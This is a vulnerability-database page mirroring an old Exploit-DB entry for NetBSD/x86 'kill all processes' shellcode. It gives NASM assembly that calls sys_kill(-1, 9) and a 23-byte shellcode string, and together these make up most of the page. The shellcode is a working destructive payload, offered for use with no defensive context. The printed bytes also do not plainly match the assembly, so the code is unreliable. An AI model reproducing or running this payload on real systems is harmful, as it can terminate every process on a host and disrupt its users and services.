NetBSD/x86 - Kill All Processes Shellcode (23 bytes)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057919 漏洞类型
发布时间 2009-06-18 更新时间 2009-06-18
CVE编号 N/A CNNVD-ID N/A
漏洞平台 NetBSD_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13470
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*

netbsd/x86 kill all processes shellcode
author Anonymous

this shellcode is using syscall number 37 or 0x25
37      STD             { int sys_kill(int pid, int signum); }


here is assembler code using intel syntaxe and NASM
--------------begin-----------

section .note.netbsd.ident
 	dd	0x07,0x04,0x01
 	db	"NetBSD",0x00,0x00
 	dd	200000000
 
 
 section .data

 section .text
 	global _start
 
 _start:
xor eax, eax
push 0x09
mov eax, -1
push eax
xor eax,eax
mov al, 37 
push eax
int 0x80
-------------------------end------------

if we dissasemble this code wi will get shellcode
"\x66\x31\xc0\x68\x09\x00\x66\xb8\xff\xff\xff\xff\x66\x50\x66\x31\xc0\xb0\x25\x66\x50\xcd\x80"
*/

// milw0rm.com [2009-06-18]